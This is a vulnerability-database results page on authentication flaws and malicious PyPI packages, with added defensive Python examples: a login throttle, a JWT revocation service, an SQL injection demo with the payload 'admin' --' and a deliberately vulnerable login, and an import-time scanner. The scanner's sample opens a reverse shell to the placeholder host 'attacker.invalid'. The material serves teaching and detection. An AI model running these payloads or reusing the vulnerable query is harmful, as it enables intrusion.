Lucene search

158 matches found

EUVD | added 2025/10/03 8:07 p.m. | 3 views
EUVD-2023-53984
Malicious code in bioql PyPI...
CVSS 8.2 | AI score 8.2 | EPSS 0.00416
Exploits 0 | References 1

EUVD | added 2025/10/03 8:07 p.m. | 5 views
EUVD-2025-21385
Malicious code in bioql PyPI...
CVSS 6.5 | AI score 6.3 | EPSS 0.00565
Exploits 2 | References 8

Positive Technologies | added 2025/09/10 12:00 a.m. | 4 views
PT-2025-37074
Name of the Vulnerable Software and Affected Versions: Indico versions prior to 3.3.8. Description: Indico is an event management system that utilizes Flask-Multipass, a multi-backend authentication system for Flask. A broken access check in a legacy API used to retrieve user details allowed...
CVSS 4.3 | AI score 6.5 | EPSS 0.00235
Exploits 0 | References 8

CNNVD | added 2025/09/09 12:00 a.m. | 3 views
uverif security vulnerability
uverif is a free and open source web authentication management system from uverif. A security vulnerability exists in uverif 3.2 and earlier versions, stemming from SQL injection caused by incorrect handling of the note parameter of the addbatch function in the file /admin/kamilist...
CVSS 6.5 | AI score 7 | EPSS 0.00229
Exploits 0 | References 4

RedHat Linux | added 2025/07/29 1:35 a.m. | 2 views
Moderate: Red Hat Security Advisory: Red Hat build of Keycloak 26.2.6 Security Update
New Red Hat build of Keycloak 26.2.6 packages are available from the Customer Portal. Red Hat build of Keycloak 26.2.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Security fixes...
CVSS 7.1 | AI score 6.1 | EPSS 0.00365
Exploits 0 | References 5

RedhatCVE | added 2025/07/16 8:58 p.m. | 5 views
CVE-2025-53640
Indico is an event management system that uses Flask-Multipass, a multi-backend authentication system for Flask. Starting in version 2.2 and prior to version 3.3.7, an endpoint used to display details of users listed in certain fields such as ACLs could be misused to dump basic user details such ...
CVSS 6.5 | AI score 7.4 | EPSS 0.00565
Exploits 2 | References 1

Github Security Blog | added 2025/07/16 2:09 p.m. | 4 views
File Browser's insecure JWT handling can lead to session replay attacks after logout
Summary: File Browser's authentication system issues long-lived JWT tokens that remain valid even after the user logs out. Please refer to the CWEs listed in this report for further reference and system standards. In summary, the main issue is: - Tokens remain valid after logout session replay...
CVSS 9.8 | AI score 6.5 | EPSS 0.00498
Exploits 1 | References 4 | Affected Software 2

OSV | added 2025/07/16 2:09 p.m. | 2 views
GHSA-7XWP-2CPP-P8R7 File Browser's insecure JWT handling can lead to session replay attacks after logout
Summary: File Browser's authentication system issues long-lived JWT tokens that remain valid even after the user logs out. Please refer to the CWEs listed in this report for further reference and system standards. In summary, the main issue is: - Tokens remain valid after logout session replay...
CVSS 8.7 | AI score 6.4 | EPSS 0.00498
Exploits 1 | References 4

OSV | added 2025/07/15 6:12 p.m. | 2 views
CVE-2025-53826 FileBrowser Has Insecure JWT Handling Which Allows Session Replay Attacks after Logout
File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename, and edit files. In version 2.39.0, File Browser's authentication system issues long-lived JWT tokens that remain valid even after the user logs out. As of time of...
CVSS 8.7 | AI score 6.8 | EPSS 0.00498
Exploits 1 | References 4

Positive Technologies | added 2025/07/15 12:00 a.m. | 2 views
PT-2025-29588
Name of the Vulnerable Software and Affected Versions: File Browser version 2.39.0. Description: File Browser provides a file managing interface within a specified directory, allowing users to upload, delete, preview, rename, and edit files. The authentication system in version 2.39.0 issues...
CVSS 9.8 | AI score 6.7 | EPSS 0.00718
Exploits 4 | References 69

AlmaLinux | added 2025/06/03 12:00 a.m. | 7 views
Moderate: krb5 security update
Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the...
CVSS 5.9 | AI score 7 | EPSS 0.00276
Exploits 0 | References 4

RedhatCVE | added 2025/05/23 8:08 a.m. | 4 views
CVE-2024-45042
Ory Kratos is an identity, user management and authentication system for cloud services. Prior to version 1.3.0, given a number of preconditions, the highest_available setting will incorrectly assume that the identity's highest available AAL is aal1 even though it really is aal2. This means that t...
CVSS 4.4 | AI score 7.1 | EPSS 0.00323
Exploits 0

RedhatCVE | added 2025/05/23 7:41 a.m. | 3 views
CVE-2024-55008
JATOS 3.9.4 contains a denial-of-service (DoS) vulnerability in the authentication system, where an attacker can prevent legitimate users from accessing their accounts by repeatedly sending multiple failed login attempts. Specifically, by submitting 3 incorrect login attempts every minute, the...
CVSS 7.5 | AI score 7.1 | EPSS 0.00798
Exploits 1 | References 1

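Added example, not JATOS code: a login throttle that slows a password-guessing attacker without the lockout-based denial of service the entry above describes, where a few wrong passwords against a username are enough to shut its owner out. The class name `LoginThrottle`, the delays, the step-up threshold and the timestamps in the usage are constructed for illustration; the caller is assumed to verify the password itself and pass the result in.

```python
import time
from typing import Dict, Optional, Tuple


class LoginThrottle:
    """Exponential back-off on failed logins keyed by (client address, account).

    Constructed example, not JATOS code. A hard per-account lockout lets anyone who
    knows a username shut its owner out with a few wrong passwords. Here an attacker's
    failures from one address never delay the real user arriving from another; an
    account that draws failures from many addresses is flagged for a second factor or
    CAPTCHA instead of being refused.
    """

    def __init__(self, base_delay: float = 1.0, max_delay: float = 300.0,
                 window: float = 3600.0, step_up_threshold: int = 10) -> None:
        self.base_delay = base_delay          # delay after the first failure, seconds
        self.max_delay = max_delay            # cap on the doubling delay
        self.window = window                  # failures older than this are forgotten
        self.step_up_threshold = step_up_threshold
        # (address, account) -> (consecutive failures, time of the last failure)
        self._failures: Dict[Tuple[str, str], Tuple[int, float]] = {}

    def _state(self, addr: str, account: str, now: float) -> Tuple[int, float]:
        count, last = self._failures.get((addr, account), (0, 0.0))
        return (0, 0.0) if now - last > self.window else (count, last)

    def retry_after(self, addr: str, account: str, now: Optional[float] = None) -> float:
        """Seconds until this address may try this account again; 0.0 means now."""
        now = time.time() if now is None else now
        count, last = self._state(addr, account, now)
        if count == 0:
            return 0.0
        delay = min(self.base_delay * 2 ** (count - 1), self.max_delay)
        return max(0.0, last + delay - now)

    def account_failures(self, account: str, now: Optional[float] = None) -> int:
        """Recent failures against one account, summed over all client addresses."""
        now = time.time() if now is None else now
        return sum(count for (_, acct), (count, last) in self._failures.items()
                   if acct == account and now - last <= self.window)

    def needs_step_up(self, account: str, now: Optional[float] = None) -> bool:
        """True when the account is under distributed attack and deserves MFA/CAPTCHA."""
        return self.account_failures(account, now) >= self.step_up_threshold

    def attempt(self, addr: str, account: str, password_ok: bool,
                now: Optional[float] = None) -> str:
        """Record one login attempt; returns 'throttled', 'denied' or 'ok'.

        The caller verifies the password itself and passes the result in. On 'ok' it
        should also consult needs_step_up() before issuing a session.
        """
        now = time.time() if now is None else now
        if self.retry_after(addr, account, now) > 0:
            return "throttled"
        if password_ok:
            self._failures.pop((addr, account), None)
            return "ok"
        count, _ = self._state(addr, account, now)
        self._failures[(addr, account)] = (count + 1, now)
        return "denied"
```

Keying on (address, account) means the three failures a minute the advisory mentions only delay the address that sent them; `needs_step_up` gives the application a place to demand a second factor or CAPTCHA once an account draws failures from many addresses, which is the signal a hard lockout was trying to act on. Behind a shared NAT or proxy the address must come from a trusted forwarding header, or the same collateral lockout comes back.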
RedhatCVE | added 2025/05/23 3:55 a.m. | 5 views
CVE-2023-34240
Cloudexplorer-lite is an open source cloud software stack. Weak passwords can be easily guessed and are an easy target for brute force attacks. This can lead to an authentication system failure and compromise system security. Versions of cloudexplorer-lite prior to 1.2.0 did not enforce strong...
CVSS 9.8 | AI score 7 | EPSS 0.00393
Exploits 0

RedhatCVE | added 2025/05/22 11:00 p.m. | 4 views
CVE-2022-33178
A vulnerability in the RADIUS authentication system of Brocade Fabric OS before Brocade Fabric OS 9.0 could allow a remote attacker to execute arbitrary code on the Brocade switch...
CVSS 7.2 | AI score 8 | EPSS 0.01289
Exploits 0 | References 1

RedhatCVE | added 2025/05/22 7:36 p.m. | 4 views
CVE-2021-29452
a12n-server is an npm package which aims to provide a simple authentication system. A new HAL-Form was added to allow editing users in version 0.18.0. This feature should only have been accessible to admins. Unfortunately, privileges were incorrectly checked allowing any logged in user to make th...
CVSS 8.1 | AI score 7.1 | EPSS 0.00781
Exploits 0 | References 1

RedhatCVE | added 2025/05/22 4:52 p.m. | 6 views
CVE-2020-8826
As of v1.5.0, the Argo web interface authentication system issued immutable tokens. Authentication tokens, once issued, were usable forever without expiration: there was no refresh or forced re-authentication...
CVSS 7.5 | AI score 7.2 | EPSS 0.01712
Exploits 1 | References 1

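Added example, not File Browser's or Argo's code, covering both token-lifetime bugs on this page: the File Browser entries (CVE-2025-53826 / GHSA-7XWP-2CPP-P8R7 / PT-2025-29588), where tokens stay valid after logout, and the Argo entry (CVE-2020-8826), where tokens never expired. It uses only the Python standard library to build HS256 JWTs; `TokenService`, the key, the 15-minute default lifetime and the explicit `now` parameter (passed in so the behaviour is reproducible) are constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict, Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


class TokenService:
    """HS256 JWTs with a short lifetime and a server-side denylist checked on every request.

    Constructed example; not File Browser's or Argo's code. verify() enforces an 'exp'
    claim (the Argo entry issued tokens that never expired) and consults a revocation
    list keyed by 'jti' that logout() fills (the File Browser entries left tokens usable
    after logout).
    """

    def __init__(self, key: bytes, ttl_seconds: int = 900) -> None:
        self._key = key
        self._ttl = ttl_seconds
        self._revoked: Dict[str, int] = {}  # jti -> exp; droppable once exp has passed

    def _sign(self, signing_input: str) -> bytes:
        return hmac.new(self._key, signing_input.encode("ascii"), hashlib.sha256).digest()

    def issue(self, subject: str, now: Optional[int] = None) -> str:
        now = int(time.time()) if now is None else now
        header = {"alg": "HS256", "typ": "JWT"}
        claims = {"sub": subject, "iat": now, "exp": now + self._ttl,
                  "jti": secrets.token_hex(16)}  # unique id makes per-token revocation possible
        signing_input = ".".join(_b64url(json.dumps(part, separators=(",", ":")).encode())
                                 for part in (header, claims))
        return signing_input + "." + _b64url(self._sign(signing_input))

    def verify(self, token: str, now: Optional[int] = None) -> Optional[dict]:
        """Claims if the token is authentic, unexpired and not revoked; otherwise None."""
        now = int(time.time()) if now is None else now
        parts = token.split(".")
        if len(parts) != 3:
            return None
        header_b64, claims_b64, sig_b64 = parts
        try:
            expected = self._sign(header_b64 + "." + claims_b64)
            if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
                return None
            header = json.loads(_b64url_decode(header_b64))
            claims = json.loads(_b64url_decode(claims_b64))
        except ValueError:  # bad base64, bad JSON or bad UTF-8
            return None
        if header.get("alg") != "HS256":
            return None  # the token never gets to choose the algorithm
        if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
            return None  # expired or missing exp: the never-expiring-token failure mode
        if claims.get("jti") in self._revoked:
            return None  # logged out: the valid-after-logout failure mode
        return claims

    def logout(self, token: str, now: Optional[int] = None) -> bool:
        """Revoke a still-valid token; it stays on the denylist until it would have expired."""
        claims = self.verify(token, now)
        if claims is None:
            return False
        self._revoked[claims["jti"]] = claims["exp"]
        return True

    def purge(self, now: Optional[int] = None) -> None:
        """Drop denylist entries whose tokens have expired anyway."""
        now = int(time.time()) if now is None else now
        self._revoked = {jti: exp for jti, exp in self._revoked.items() if exp > now}

    def revoked_count(self) -> int:
        return len(self._revoked)
```

Both checks sit in `verify()`, which every request passes through; a denylist consulted only at login time does nothing for a token that is already out. The denylist holds only tokens revoked before their `exp`, so a short lifetime keeps it small and `purge()` keeps it bounded. In a multi-instance deployment the list has to live in shared storage, otherwise logout on one node leaves the token valid on the others.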
RedhatCVE | added 2025/05/22 4:35 a.m. | 5 views
CVE-2011-4801
SQL injection vulnerability in akeyActivationLogin.do in Authenex Web Management Control in Authenex Strong Authentication System (ASAS) Server 3.1.0.2 and 3.1.0.3 allows remote attackers to execute arbitrary SQL commands via the username parameter...
CVSS 7.5 | AI score 8.8 | EPSS 0.01234
Exploits 1 | References 1

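Added example, not code from Authenex or uverif, showing the bug class behind the Authenex entry above (SQL injection via the login username parameter) and the uverif entry earlier on this page (injection via the note parameter of addbatch): the vulnerable string-building query beside its parameterized form, run against a constructed SQLite table. The table, the placeholder hash and the function names are constructed for illustration; the same parameterization applies unchanged to the INSERT in the uverif case.

```python
import sqlite3
from typing import Optional

# Placeholder standing in for a real password hash in the constructed user table.
CONSTRUCTED_HASH = "constructed-hash-of-secret"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user store with a single admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", CONSTRUCTED_HASH))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> Optional[str]:
    """The bug pattern: request data spliced into the statement text."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
             % (username, password_hash))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> Optional[str]:
    """The fix: bound parameters travel as values, so the username can never become SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchone()
    return row[0] if row else None


# A username that closes the string literal and comments out the password check:
# SELECT ... WHERE username = 'admin' --' AND password_hash = '...'
PAYLOAD = "admin' --"
```

`login_vulnerable` accepts `PAYLOAD` with any password because the `--` turns the rest of the statement into a comment; `login_safe` looks for a user literally named `admin' --` and finds none. Escaping quotes by hand is not a substitute: the driver's parameter binding keeps data and statement apart regardless of what the value contains.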
OSV | added 2025/05/07 7:11 p.m. | 3 views
RLSA-2024:5312 Moderate: krb5 security update
Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the...
CVSS 7.5 | AI score 8.9 | EPSS 0.01863
Exploits 0 | References 3

OSSF Malicious Packages | added 2025/04/02 7:54 p.m. | 7 views
Malicious code in flask-auth-sys (PyPI)
--- -= Per source details. Do not edit below this line. =- Source: kam193 a241889bfae20aee5395660063d13f337aa9733c14b02bf2edb004d6d36e1d41 On importing the module, the code attempts to spawn a reverse shell. In the current version, the remote domain does not exist. --- Category: MALICIOUS - The...
AI score 7.7
Exploits 0 | References 1

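Added example, not the OSSF report's or the package's code: a static check for the behaviour the entry above describes, code that runs the moment a module is imported and reaches for a socket or a shell. It walks a module's AST, keeps only the statements that execute at import time (function bodies and the `__main__` guard are skipped; decorators, default arguments and class bodies are kept because they do run), resolves import aliases, and reports calls matching a constructed list. `SAMPLE_MALICIOUS` and `SAMPLE_BENIGN` are inputs constructed for this example, and `attacker.invalid` is a placeholder host.

```python
import ast
from typing import Dict, Iterator, List, Optional, Tuple

# Calls that, when they run at import time, indicate network access, process spawning
# or code loading. Constructed list for this example; a real scanner extends it.
SUSPICIOUS_CALLS = {
    "socket.socket", "socket.create_connection", "os.dup2", "os.system", "os.popen",
    "os.execv", "os.execve", "pty.spawn", "subprocess.Popen", "subprocess.call",
    "subprocess.run", "subprocess.check_output", "exec", "eval", "compile",
    "base64.b64decode", "urllib.request.urlopen",
}


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Turn an Attribute chain rooted in a Name (a.b.c) into 'a.b.c'; None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))


def _is_main_guard(node: ast.AST) -> bool:
    return isinstance(node, ast.If) and any(
        isinstance(n, ast.Name) and n.id == "__name__" for n in ast.walk(node.test))


def _import_time_nodes(node: ast.AST) -> Iterator[ast.AST]:
    """Yield the nodes that execute when the module is imported."""
    yield node
    if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
        # The body only runs when called; decorators and defaults run at definition.
        children = [*node.decorator_list, *node.args.defaults,
                    *[d for d in node.args.kw_defaults if d is not None]]
    elif isinstance(node, ast.Lambda) or _is_main_guard(node):
        children = []
    else:
        children = list(ast.iter_child_nodes(node))
    for child in children:
        yield from _import_time_nodes(child)


def scan_source(source: str) -> List[Tuple[int, str]]:
    """Return (line, resolved call name) for suspicious calls that run on import."""
    tree = ast.parse(source)
    aliases: Dict[str, str] = {}  # local binding -> fully qualified name
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.asname:
                    aliases[alias.asname] = alias.name
                else:
                    top = alias.name.split(".")[0]
                    aliases[top] = top
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for alias in node.names:
                if alias.name != "*":
                    aliases[alias.asname or alias.name] = node.module + "." + alias.name
    findings = []
    for node in _import_time_nodes(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        head, _, rest = name.partition(".")
        resolved = aliases.get(head, head) + ("." + rest if rest else "")
        if resolved in SUSPICIOUS_CALLS:
            findings.append((node.lineno, resolved))
    return findings


# Constructed sample mimicking the entry above: a module that opens a connection and
# hands a shell to it as soon as it is imported ("attacker.invalid" is a placeholder).
SAMPLE_MALICIOUS = '''
import socket, subprocess, os

def helper():
    return 1

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker.invalid", 4444))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
subprocess.call(["/bin/sh", "-i"])
'''

# Constructed benign sample: subprocess is used only inside a function and a
# script-entry guard, neither of which runs on import.
SAMPLE_BENIGN = '''
import subprocess

def run(cmd):
    return subprocess.run(cmd, check=True)

if __name__ == "__main__":
    subprocess.run(["id"])
'''
```

This is a triage aid, not a verdict: obfuscated packages decode their payload at runtime through `exec` or `base64.b64decode` (both on the list) or fetch it over the network, calls reached through `getattr` or `__import__` are invisible to name resolution, and a package's setup.py runs at install time, so it deserves the same scan as any module.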